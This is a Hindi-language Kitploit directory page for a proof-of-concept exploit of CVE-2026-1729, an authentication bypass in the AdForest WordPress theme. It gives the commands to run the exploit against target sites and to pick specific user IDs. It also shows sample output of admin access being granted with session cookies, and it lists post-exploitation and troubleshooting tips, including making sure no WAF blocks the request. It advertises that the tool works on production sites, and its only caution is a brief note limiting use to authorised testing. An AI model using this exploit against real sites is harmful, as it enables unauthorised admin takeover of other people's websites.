Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — WordPress के लिए AdForest थीम सभी संस्करणों में, जिसमें 6.0.12 भी शामिल है, प्रमाणीकरण बायपास के प्रति संवेदनशील है। यह प्लगइन द्वारा 'sb_login_user_with_otp_fun' फ़ंक्शन के माध्यम से उपयोगकर्ता को प्रमाणित करने से पहले उसकी पहचान को ठीक से सत्यापित न करने के कारण है। इससे अनप्रमाणित हमलावरों के लिए लॉग इन करना संभव हो जाता है, जिसमें एडमिन भी शामिल है। | Kitploit
उपकरण/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
37 महीने पहलेअभी तक समीक्षित नहीं

WordPress के लिए AdForest थीम सभी संस्करणों में, जिसमें 6.0.12 भी शामिल है, प्रमाणीकरण बायपास के प्रति संवेदनशील है। यह प्लगइन द्वारा 'sb_login_user_with_otp_fun' फ़ंक्शन के माध्यम से उपयोगकर्ता को प्रमाणित करने से पहले उसकी पहचान को ठीक से सत्यापित न करने के कारण है। इससे अनप्रमाणित हमलावरों के लिए लॉग इन करना संभव हो जाता है, जिसमें एडमिन भी शामिल है।

साझा करें

CVE-2026-1729 - AdForest WordPress प्रमाणीकरण बाईपास PoC

विवरण

CVE-2026-1729 के लिए सरल प्रूफ ऑफ कॉन्सेप्ट (PoC) - AdForest WordPress थीम में प्रमाणीकरण बाईपास भेद्यता। लेखक: f3ds cr3w est 2oo2 ब्लॉग

विशेषताएँ

  • ✅ बिना क्रेडेंशियल के सीधे व्यवस्थापक पहुंच
  • ✅ उत्पादन WordPress इंस्टेंस पर काम करता है
  • ✅ कोई Docker सेटअप आवश्यक नहीं
  • ✅ सरल कमांड-लाइन इंटरफ़ेस
  • ✅ सत्र स्थिरता

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी

स्थापना

root@kitploit:~
pip install requests

उपयोग

बुनियादी उपयोग

root@kitploit:~
python poc/exploit.py https://target-site.com

विशिष्ट उपयोगकर्ता आईडी लक्ष्यित करें

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

उदाहरण

root@kitploit:~
# डिफ़ॉल्ट व्यवस्थापक (यूज़र आईडी 1) का शोषण करें
python poc/exploit.py https://example.com

# विशिष्ट उपयोगकर्ता खाते का शोषण करें
python poc/exploit.py https://example.com --user-id 5

# कई लक्ष्यों का परीक्षण करें
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

आउटपुट

root@kitploit:~
CVE-2026-1729 - AdForest WordPress प्रमाणीकरण बाईपास
=======================================================
चेतावनी: केवल अधिकृत परीक्षण के लिए!
=======================================================
[+] लक्ष्य: https://example.com
[+] लक्ष्यित उपयोगकर्ता आईडी: 1
[+] एक्सप्लॉइट भेजा जा रहा है: https://example.com/wp-admin/admin-ajax.php
[+] सफलता! व्यवस्थापक पहुंच प्रदान की गई
[+] व्यवस्थापक URL: https://example.com/wp-admin/
[+] सत्र कुकीज़: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] admin के रूप में लॉग इन किया गया

🎯 एक्सप्लॉइट सफलतापूर्वक पूरा हुआ!
अब आपके पास WordPress साइट पर व्यवस्थापक पहुंच है।

एक्सप्लॉइट के बाद क्या होता है

  1. व्यवस्थापक पहुंच: आपको /wp-admin/ तक पूर्ण व्यवस्थापक पहुंच मिलती है
  2. सत्र स्थिरता: एक्सप्लॉइट सत्र कुकीज़ बनाए रखता है
  3. उपयोगकर्ता जानकारी: दिखाता है कि आपने कौन सा खाता समझौता किया है
  4. सीधी पहुंच: आप तुरंत WordPress व्यवस्थापक डैशबोर्ड तक पहुंच सकते हैं

नोट्स

  • कानूनी उपयोग: केवल उन साइटों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • लक्ष्य आवश्यकताएँ: साइट पर AdForest थीम स्थापित होनी चाहिए
  • सफलता दर: AdForest थीम के असुरक्षित संस्करणों पर काम करता है
  • कोई स्थापना नहीं: लक्ष्य सर्वर पर कुछ भी स्थापित करने की आवश्यकता नहीं है

समस्या निवारण

यदि एक्सप्लॉइट विफल होता है:

  1. जांचें कि AdForest थीम स्थापित है
  2. जांचें कि साइट WordPress चला रही है
  3. सुनिश्चित करें कि थीम संस्करण असुरक्षित है
  4. अनुरोध को अवरुद्ध करने वाला कोई WAF या सुरक्षा प्लगइन नहीं
टूल डाउनलोड करें